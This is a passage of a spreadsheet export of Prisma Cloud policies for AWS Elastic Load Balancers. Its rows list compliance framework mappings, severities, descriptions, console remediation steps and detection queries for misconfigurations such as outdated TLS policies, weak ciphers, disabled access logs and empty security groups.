          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-elbv2-describe-load-balancers' AND json.rule = type equals application and listeners[?any(protocol equals HTTPS and sslPolicy exists and sslPolicy is not member of ('ELBSecurityPolicy-TLS13-1-2-2021-06','ELBSecurityPolicy-TLS13-1-2-FIPS-2023-04'))] exists</t>
        </is>
      </c>
      <c r="AA1906" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1906" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1906" t="inlineStr">
        <is>
          <t>PC-AWS-ELB-631</t>
        </is>
      </c>
      <c r="AD1906" t="b">
        <v>1</v>
      </c>
      <c r="AE1906" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1906" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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6" t="inlineStr">
        <is>
          <t>cc5a49ce-509c-4779-bb00-e1fc6fc6b10c</t>
        </is>
      </c>
      <c r="AI1906" t="inlineStr">
        <is>
          <t>1ae28671-f3a2-4e16-bf1b-96999e024709</t>
        </is>
      </c>
      <c r="AJ1906" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1906" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1907">
      <c r="A1907" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, RBI Baseline Cyber Security and Resilience Requirements, CRI Profile v2.0, Brazilian Data Protection Law (LGPD), Sarbanes Oxley Act (SOX), CDC NIST 800-53 Rev4, APRA (CPS 234) Information Security, MLPS 2.0 (Level 2), PCI DSS v4.0, NIST CSF v2.0, ISO/IEC 27017:2015, MLPS 2.0 (Level 2), ISO 27002:2022, Risk Management in Technology (RMiT), Australian Energy Sector Cyber Security Framework (AESCSF), ISO/IEC 27002:2013, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, ITSG-33, Secure Controls Framework (SCF) - 2024.2, PCI DSS v4.0, PCI DSS v4.0, MITRE ATT&amp;CK v12, CSA CCM v.4.0.1, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, NYDFS 23 CRR-NY 500.0, ISO/IEC 27017:2015, PCI DSS v3.2.1, CIS Controls v8, CSA CCM v.4.0.1, GDPR, ISO/IEC 27017:2015, kfirdaus AWS Account-CS, Microsoft Cloud Security Benchmark v1, CIS Controls v7.1, ISO/IEC 27001:2022, CyberSecurity Law of the People's Republic of China, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, APRA (CPS 234) Information Security, MAS TRM 2021, PCI DSS v4.0, HITRUST CSF v.9.6.0, HITRUST v.9.4.2 [Deprecated], ISO 27002:2022, CSA CCM v.4.0.6, TX-RAMP Level 1, NIST SP 800-171 Revision 2, Secure Controls Framework (SCF) - 2022.2.1, NIST 800-53 Rev 5, NIST SP 800-172, Copy of CIS Controls v8, PCI DSS v4.0, TX-RAMP Level 2, CSA CCM v4.0.12, NIST CSF v2.0, Copy of ACSC Information Security Manual (ISM)-clone, HITRUST v.9.4.2 [Deprecated], NYDFS 23 CRR-NY 500.0, CHC HITRUST CSF v.9.6.0, CSA CCM v4.0.12, RBI Baseline Cyber Security and Resilience Requirements, HITRUST CSF v.11.2.0, Copy of CIS Controls v8, CyberSecurity Law of the People's Republic of China, Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1, PCI DSS v4.0, PCI DSS v4.0, CIS AWS 3 Tier Web Architecture Benchmark v.1.0.0, CIS Controls v8, FFIEC, CSA CCM v.4.0.1, CIS Controls v8.1, CRI Profile v2.0, PCI DSS v4.0, Risk Management in Technology (RMiT), MLPS 2.0, CHC HITRUST CSF v.9.6.0, Insurance Regulatory And Development Authority Of India, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, CRI Profile v1.2.1, HITRUST CSF v.11.2.0, NIST 800-53 Rev4, ISO 27002:2022, kashan ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, CIS Controls v7.1, ISO/IEC 27002:2013, PCI DSS v4.0, SOC 2, APRA (CPS 234) Information Security, HIPAA, kfirdaus AWS Account-CS, PIPEDA, Fedramp (Moderate), MLPS 2.0 (Level 3), NIST CSF, kashan ACSC Information Security Manual (ISM), PCI DSS v4.0, PCI DSS v4.0, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, CRI Profile v1.2.1, CSA CCM v.4.0.6, CRI Profile v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, NYDFS 23 CRR-NY 500.0, FFIEC, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, CCPA 2018, MITRE ATT&amp;CK v10.0 [Deprecated], MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CSA CCM v.4.0.6, CIS Controls v8.1, CSA CCM v4.0.12, DORA, CSA CCM v.4.0.6, HITRUST CSF v.9.6.0, Matt's ATT&amp;ACK, ISO/IEC 27001:2022, DORA, Copy of ACSC Information Security Manual (ISM)-clone, PCI DSS v3.2.1, HITRUST CSF v.9.6.0, PCI DSS v4.0, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CHC HITRUST CSF v.9.6.0, NIST CSF v2.0</t>
        </is>
      </c>
      <c r="B1907" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C1907" s="2" t="inlineStr"/>
      <c r="D1907" t="n">
        <v>0</v>
      </c>
      <c r="E1907" t="n">
        <v>25</v>
      </c>
      <c r="F1907" t="n">
        <v>0</v>
      </c>
      <c r="G1907" t="b">
        <v>1</v>
      </c>
      <c r="H19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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1907" t="inlineStr">
        <is>
          <t>aws-elbv2</t>
        </is>
      </c>
      <c r="K1907" t="inlineStr">
        <is>
          <t>AWS Elastic Load Balancer v2 (ELBv2) with access log disabled</t>
        </is>
      </c>
      <c r="L1907" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1907" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1907" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1907" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1907" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1907" t="inlineStr">
        <is>
          <t>Control Category: 09.0</t>
        </is>
      </c>
      <c r="R1907" t="inlineStr">
        <is>
          <t>09.aa</t>
        </is>
      </c>
      <c r="S1907" t="inlineStr"/>
      <c r="T1907" t="b">
        <v>0</v>
      </c>
      <c r="U1907" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1907" t="inlineStr">
        <is>
          <t>aws-elbv2-describe-load-balancers</t>
        </is>
      </c>
      <c r="W1907" t="inlineStr">
        <is>
          <t>This policy identifies Elastic Load Balancers v2 (ELBv2) which have access log disabled. Access logs capture detailed information about requests sent to your load balancer and each log contains information such as the time the request was received, the client's IP address, latencies, request paths, and server responses. You can use these access logs to analyze traffic patterns and troubleshoot issues.</t>
        </is>
      </c>
      <c r="X1907" t="inlineStr">
        <is>
          <t>1. Sign into the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to EC2 dashboard
4. Click on 'Load Balancers' (Left Panel)
5. Select the reported ELB
6. Click on 'Actions' drop-down
7. Click on 'Edit attributes'
8. In the 'Edit load balancer attributes' popup box, Choose 'Enable' for 'Access logs' and configure S3 location where you want to store ELB logs.
9. Click on 'Save' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-22
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-22</t>
        </is>
      </c>
      <c r="Y1907" t="inlineStr"/>
      <c r="Z1907" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-elbv2-describe-load-balancers' AND json.rule = "state.code contains active and ['attributes'].['access_logs.s3.enabled'] contains false"
{"category":"Logging","resourceTypes":["aws_lb"]}</t>
        </is>
      </c>
      <c r="AA1907" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1907" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1907" t="inlineStr">
        <is>
          <t>PC-AWS-ELB-242-CKV_AWS_91</t>
        </is>
      </c>
      <c r="AD1907" t="b">
        <v>1</v>
      </c>
      <c r="AE1907" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1907" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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7" t="inlineStr">
        <is>
          <t>f2a2bcf1-2966-4cb5-9230-bd39c9903a02</t>
        </is>
      </c>
      <c r="AI1907" t="inlineStr">
        <is>
          <t>b9cdd43b-3483-48a1-9a98-313c40d3989f</t>
        </is>
      </c>
      <c r="AJ1907" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1907" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1908">
      <c r="A1908" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, ISO/IEC 27017:2015, MLPS 2.0 (Level 2), NIST SP 800-172, ISO/IEC 27017:2015, CSA CCM v.4.0.1, MAS TRM 2021, MAS TRM 2021, ISO/IEC 27017:2015, ISO/IEC 27017:2015, Secure Controls Framework (SCF) - 2024.2, NIST CSF, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, Insurance Regulatory And Development Authority Of India, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2022.2.1, DORA, CSA CCM v.4.0.1, ISO/IEC 27002:2013, PCI DSS v3.2.1, ISO/IEC 27002:2013, ISO/IEC 27017:2015, CSA CCM v.4.0.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, SOC 2, HITRUST v.9.4.2 [Deprecated], ISO/IEC 27001:2022, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1, Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, NIST SP 800-172, CSA CCM v.4.0.1, CSA CCM v.4.0.1, ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B1908" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1908" s="2" t="inlineStr"/>
      <c r="D1908" t="inlineStr"/>
      <c r="E1908" t="inlineStr"/>
      <c r="F1908" t="inlineStr"/>
      <c r="G1908" t="b">
        <v>1</v>
      </c>
      <c r="H19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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1908" t="inlineStr">
        <is>
          <t>aws-elbv2</t>
        </is>
      </c>
      <c r="K1908" t="inlineStr">
        <is>
          <t>AWS Network Load Balancer (NLB) is not using the latest predefined security policy</t>
        </is>
      </c>
      <c r="L1908" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1908" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1908" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1908" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1908" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1908" t="inlineStr">
        <is>
          <t>12</t>
        </is>
      </c>
      <c r="R1908" t="inlineStr">
        <is>
          <t>12.1.2</t>
        </is>
      </c>
      <c r="S1908" t="inlineStr"/>
      <c r="T1908" t="b">
        <v>0</v>
      </c>
      <c r="U1908" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1908" t="inlineStr">
        <is>
          <t>aws-elbv2-describe-load-balancers</t>
        </is>
      </c>
      <c r="W1908" t="inlineStr">
        <is>
          <t>This policy identifies Network Load Balancers (NLBs) which are not using the latest predefined security policy. A security policy is a combination of protocols and ciphers. The protocol establishes a secure connection between a client and a server and ensures that all data passed between the client and your load balancer is private. A cipher is an encryption algorithm that uses encryption keys to create a coded message. So it is recommended to use the latest predefined security policy which uses only secured protocol and ciphers.
For more details:
https://docs.aws.amazon.com/elasticloadbalancing/latest/network/create-tls-listener.html#describe-ssl-policies</t>
        </is>
      </c>
      <c r="X1908" t="inlineStr">
        <is>
          <t>1. Log in to the AWS console
2. In the console, select the specific region from the region drop-down on the top right corner, for which the alert is generated
3. Go to the EC2 Dashboard, and select 'Load Balancers'
4. Click on the reported Load Balancer
5. On the 'Listeners' tab, Choose the 'TLS' rule
6. Click on 'Edit', Change 'Security policy' to 'ELBSecurityPolicy-TLS13-1-2-2021-06'
7. Click on 'Update' to save your changes</t>
        </is>
      </c>
      <c r="Y1908" t="inlineStr"/>
      <c r="Z1908" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-elbv2-describe-load-balancers' AND json.rule = state.code equals active and type equals "network" and listeners[?any(protocol equals TLS and sslPolicy exists and sslPolicy does not contain ELBSecurityPolicy-TLS13-1-2-2021-06)] exists</t>
        </is>
      </c>
      <c r="AA1908" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1908" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1908" t="inlineStr">
        <is>
          <t>PC-AWS-ELB-632</t>
        </is>
      </c>
      <c r="AD1908" t="b">
        <v>1</v>
      </c>
      <c r="AE1908" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1908" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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8" t="inlineStr">
        <is>
          <t>ac5232af-7c3c-4134-866c-988757ce16d7</t>
        </is>
      </c>
      <c r="AI1908" t="inlineStr">
        <is>
          <t>5c11c97d-b17b-49c3-8be1-1ff711df3a5e</t>
        </is>
      </c>
      <c r="AJ1908" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1908" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1909">
      <c r="A1909" t="inlineStr">
        <is>
          <t>HIPAA, CHC HITRUST CSF v.9.6.0, HITRUST CSF v.9.6.0, CIS Controls v8, ISO/IEC 27001:2022, CSA CCM v.4.0.1, ISO/IEC 27001:2022, CSA CCM v.4.0.6, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CSA CCM v.4.0.6, NIST SP 800-172, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, HITRUST CSF v.9.6.0, ISO 27002:2022, CHC HITRUST CSF v.9.6.0, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, Risk Management in Technology (RMiT), ISO/IEC 27002:2013, PCI DSS v3.2.1, HITRUST v.9.4.2 [Deprecated], Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST 800-53 Rev 5, NIST CSF, ISO/IEC 27002:2013, ISO/IEC 27002:2013, HITRUST CSF v.9.6.0, MAS TRM 2021, NIST SP 800-171 Revision 2, CSA CCM v4.0.12, CIS Controls v7.1, CSA CCM v.4.0.6, ACSC Information Security Manual (ISM), CSA CCM v.4.0.6, ISO 27002:2022, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27017:2015, HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, ISO/IEC 27017:2015, GDPR, CIS Controls v7.1, DORA, ISO/IEC 27002:2013, TX-RAMP Level 2, CSA CCM v4.0.12, ISO/IEC 27002:2013, kashan ACSC Information Security Manual (ISM), FFIEC, ISO/IEC 27018:2019, Copy of CIS Controls v8, ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, CHC HITRUST CSF v.9.6.0, DORA, CSA CCM v.4.0.1, CSA CCM v.4.0.1, Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), RBI Baseline Cyber Security and Resilience Requirements, SOC 2, NIST CSF, kfirdaus AWS Account-CS, PCI DSS v3.2.1, CSA CCM v.4.0.6, ISO/IEC 27002:2013, ISO/IEC 27002:2013, ISO/IEC 27001:2022, CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2022.2.1, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), ISO/IEC 27002:2013, PCI DSS v4.0, ISO/IEC 27002:2013, ISO 27002:2022, CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B1909" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1909" s="2" t="inlineStr"/>
      <c r="D1909" t="inlineStr"/>
      <c r="E1909" t="inlineStr"/>
      <c r="F1909" t="inlineStr"/>
      <c r="G1909" t="b">
        <v>1</v>
      </c>
      <c r="H19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09" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1909" t="inlineStr">
        <is>
          <t>aws-elbv2</t>
        </is>
      </c>
      <c r="K1909" t="inlineStr">
        <is>
          <t>AWS Elastic Load Balancer v2 (ELBv2) SSL negotiation policy configured with weak ciphers</t>
        </is>
      </c>
      <c r="L1909" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1909" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1909" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1909" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1909" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1909" t="inlineStr">
        <is>
          <t>Guidelines for Cryptography</t>
        </is>
      </c>
      <c r="R1909" t="inlineStr">
        <is>
          <t>ISM-1139</t>
        </is>
      </c>
      <c r="S1909" t="inlineStr"/>
      <c r="T1909" t="b">
        <v>0</v>
      </c>
      <c r="U1909" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1909" t="inlineStr">
        <is>
          <t>aws-elbv2-describe-load-balancers</t>
        </is>
      </c>
      <c r="W1909" t="inlineStr">
        <is>
          <t>This policy identifies Elastic Load Balancers v2 (ELBv2) which are configured with SSL negotiation policy containing weak ciphers. An SSL cipher is an encryption algorithm that uses encryption keys to create a coded message. SSL protocols use several SSL ciphers to encrypt data over the Internet. As many of the other ciphers are not secure/weak, it is recommended to use only the ciphers recommended in the following AWS link: https://docs.aws.amazon.com/elasticloadbalancing/latest/application/create-https-listener.html</t>
        </is>
      </c>
      <c r="X1909" t="inlineStr">
        <is>
          <t>1. Log in to the AWS console
2. In the console, select the specific region from the region drop-down on the top right corner, for which the alert is generated
3. Go to the EC2 Dashboard, and select 'Load Balancers'
4. Click on the reported Load Balancer
5. On the 'Listeners' tab, Choose the 'HTTPS' or 'SSL' rule; Click on 'Edit', Change 'Security policy' to other than 'ELBSecurityPolicy-TLS-1-0-2015-04' as it contains DES-CBC3-SHA cipher, which is a weak cipher.
6. Click on 'Update' to save your changes.</t>
        </is>
      </c>
      <c r="Y1909" t="inlineStr"/>
      <c r="Z1909" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-elbv2-describe-load-balancers' AND json.rule = listeners[?any(sslPolicy contains ELBSecurityPolicy-TLS-1-0-2015-04)] exists</t>
        </is>
      </c>
      <c r="AA1909" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1909" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1909" t="inlineStr">
        <is>
          <t>PC-AWS-ELB-613</t>
        </is>
      </c>
      <c r="AD1909" t="b">
        <v>1</v>
      </c>
      <c r="AE1909" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1909" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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09" t="inlineStr">
        <is>
          <t>19eaf735-4d0e-4490-bfaf-669b8bc52d72</t>
        </is>
      </c>
      <c r="AI1909" t="inlineStr">
        <is>
          <t>3995a1da-41a4-4f72-a172-8268063ddf26</t>
        </is>
      </c>
      <c r="AJ1909" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1909" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1910">
      <c r="A1910" t="inlineStr">
        <is>
          <t>ISO/IEC 27017:2015, Copy of ACSC Information Security Manual (ISM)-clone, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), HITRUST v.9.4.2 [Deprecated], kashan ACSC Information Security Manual (ISM), ACSC Information Security Manual (ISM), NIST SP 800-172, ACSC Information Security Manual (ISM), HITRUST CSF v.9.6.0, ISO/IEC 27017:2015, kfirdaus AWS Account-CS, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), CSA CCM v.4.0.1, kfirdaus AWS Account-CS, PCI DSS v4.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, NIST CSF v2.0, MAS TRM 2021, MAS TRM 2021, ISO/IEC 27017:2015, ISO/IEC 27017:2015, Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v7.1, PCI DSS v3.2.1, CIS Controls v7.1, NIST CSF, TX-RAMP Level 1, ISO/IEC 27017:2015, Telecommunications Security Act - TSA, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, Sarbanes Oxley Act (SOX), CSA CCM v.4.0.1, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, HITRUST CSF v.11.2.0, MLPS 2.0 (Level 2), ISO/IEC 27002:2013, kfirdaus AWS Account-CS, Secure Controls Framework (SCF) - 2024.2, HITRUST v.9.4.2 [Deprecated], ISO/IEC 27017:2015, CHC HITRUST CSF v.9.6.0, CSA CCM v.4.0.1, ISO/IEC 27002:2013, ISO/IEC 27001:2022, PCI DSS v4.0, CSA CCM v.4.0.1, kashan ACSC Information Security Manual (ISM), SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, PCI DSS v4.0, Secure Controls Framework (SCF) - 2022.2.1, CIS Controls v8, Copy of CIS Controls v8, ITSG-33, CRI Profile v2.0, RBI Baseline Cyber Security and Resilience Requirements, GDPR, SOC 2, FFIEC, Secure Controls Framework (SCF) - 2022.2.1, ACSC Information Security Manual (ISM), kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, Copy of ACSC Information Security Manual (ISM)-clone, TX-RAMP Level 2, NIST SP 800-171 Revision 2, NIST SP 800-172, CSA CCM v.4.0.1, PCI DSS v4.0, CSA CCM v.4.0.1, ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B1910" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1910" s="2" t="inlineStr"/>
      <c r="D1910" t="inlineStr"/>
      <c r="E1910" t="inlineStr"/>
      <c r="F1910" t="inlineStr"/>
      <c r="G1910" t="b">
        <v>0</v>
      </c>
      <c r="H19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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1910" t="inlineStr">
        <is>
          <t>aws-elbv2</t>
        </is>
      </c>
      <c r="K1910" t="inlineStr">
        <is>
          <t>AWS Elastic Load Balancer v2 (ELBv2) load balancer with invalid security groups</t>
        </is>
      </c>
      <c r="L1910" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1910" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1910" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1910" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1910" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1910" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R1910" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S1910" t="inlineStr"/>
      <c r="T1910" t="b">
        <v>0</v>
      </c>
      <c r="U1910" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1910" t="inlineStr">
        <is>
          <t>aws-elbv2-describe-load-balancers</t>
        </is>
      </c>
      <c r="W1910" t="inlineStr">
        <is>
          <t>This policy identifies Elastic Load Balancer v2 (ELBv2) load balancers that do not have security groups with a valid inbound or outbound rule. A security group with no inbound/outbound rule will deny all incoming/outgoing requests. ELBv2 security groups should have at least one inbound and outbound rule, ELBv2 with no inbound/outbound permissions will deny all traffic incoming/outgoing to/from any resources configured behind that ELBv2; in other words, the ELBv2 is useless without inbound and outbound permissions.</t>
        </is>
      </c>
      <c r="X1910" t="inlineStr">
        <is>
          <t>1. Log in to the AWS console
2. In the console, select the specific region from the region drop-down on the top right corner, for which the alert is generated
3. Navigate to EC2 Dashboard
4. Click on 'Load Balancers', choose the reported load balancer
5. Click on the 'Description' tab, click on each security group, it will open Security Group properties in a new tab in your browser.
6. For to check the Inbound rule, Click on the 'Inbound Rules'
7. If there are no rules, click on 'Edit rules', add an inbound rule according to your ELBv2 functional requirement.
8. For to check the Outbound rule, Click on the 'Outbound Rules'
9. If there are no rules, click on 'Edit rules', add an outbound rule according to your ELBv2 functional requirement.
10. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y1910" t="inlineStr"/>
      <c r="Z1910" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-elbv2-describe-load-balancers' as X; config from cloud.resource where api.name = 'aws-ec2-describe-security-groups' AND json.rule = ipPermissions[*] is empty or ipPermissionsEgress[*] is empty as Y; filter '$.X.securityGroups[*] contains $.Y.groupId'; show X;</t>
        </is>
      </c>
      <c r="AA1910" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1910" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1910" t="inlineStr">
        <is>
          <t>PC-AWS-ELB-645</t>
        </is>
      </c>
      <c r="AD1910" t="b">
        <v>1</v>
      </c>
      <c r="AE1910" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1910" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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0" t="inlineStr">
        <is>
          <t>df15f8be-e55c-4b5b-84a6-910f346d173d</t>
        </is>
      </c>
      <c r="AI1910" t="inlineStr">
        <is>
          <t>0d6b5c29-471c-45aa-bbaa-f215d7575e7b</t>
        </is>
      </c>
      <c r="AJ1910" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1910" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1911">
      <c r="A1911" t="inlineStr">
        <is>
          <t>HIPAA, MAS TRM 2021, CHC HITRUST CSF v.9.6.0, HITRUST CSF v.9.6.0, CIS Controls v8, ISO/IEC 27001:2022, CSA CCM v.4.0.1, ISO/IEC 27001:2022, APRA (CPS 234) Information Security, CSA CCM v.4.0.6, ISO/IEC 27002:2013, GDPR, CSA CCM v.4.0.6, NIST SP 800-172, HITRUST CSF v.9.6.0, ISO 27002:2022, CHC HITRUST CSF v.9.6.0, Risk Management in Technology (RMiT), HITRUST v.9.4.2 [Deprecated], ISO/IEC 27002:2013, HITRUST v.9.4.2 [Deprecated], ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27002:2013, NYDFS 23 CRR-NY 500.0, ISO/IEC 27002:2013, NIST 800-53 Rev 5, NIST CSF, ISO/IEC 27002:2013, Telecommunications Security Act - TSA, ISO/IEC 27002:2013, HITRUST CSF v.9.6.0, NIST SP 800-171 Revision 2, CSA CCM v4.0.12, CIS Controls v7.1, CSA CCM v.4.0.6, PCI DSS v3.2.1, CSA CCM v.4.0.6, ISO 27002:2022, ISO/IEC 27017:2015, HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, ISO/IEC 27017:2015, GDPR, Telecommunications Security Act - TSA, Secure Controls Framework (SCF) - 2024.2, CIS Controls v7.1, ACSC Information Security Manual (ISM), DORA, ISO/IEC 27002:2013, TX-RAMP Level 2, CSA CCM v4.0.12, ISO/IEC 27002:2013, NIST 800-53 Rev4, kfirdaus AWS Account-CS, CDC NIST 800-53 Rev4, FFIEC, ISO/IEC 27018:2019, kfirdaus AWS Account-CS, Copy of CIS Controls v8, ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, CHC HITRUST CSF v.9.6.0, DORA, MLPS 2.0 (Level 3), CSA CCM v.4.0.1, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), APRA (CPS 234) Information Security, kashan ACSC Information Security Manual (ISM), RBI Baseline Cyber Security and Resilience Requirements, SOC 2, NIST CSF, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.6, Copy of ACSC Information Security Manual 